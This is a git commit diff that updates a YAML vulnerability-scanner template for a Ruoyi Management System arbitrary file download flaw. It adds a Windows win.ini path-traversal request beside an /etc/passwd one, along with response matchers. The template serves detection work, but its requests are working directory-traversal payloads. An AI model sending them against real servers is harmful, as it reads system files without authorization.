Merge pull request #4065 from ritikchaddha/patch-9

Update CNVD-2021-01931.yaml
patch-1
Prince Chaddha 2022-04-07 18:41:07 +05:30 committed by GitHub
commit b068c3c966
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 5 deletions

View File

@ -2,7 +2,7 @@ id: CNVD-2021-01931
info:
name: Ruoyi Management System Arbitrary File Download
author: daffainfo
author: daffainfo,ritikchaddha
severity: high
reference: https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
tags: ruoyi,lfi,cnvd,cnvd2021
@ -11,13 +11,19 @@ requests:
- method: GET
path:
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
matchers-condition: and
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and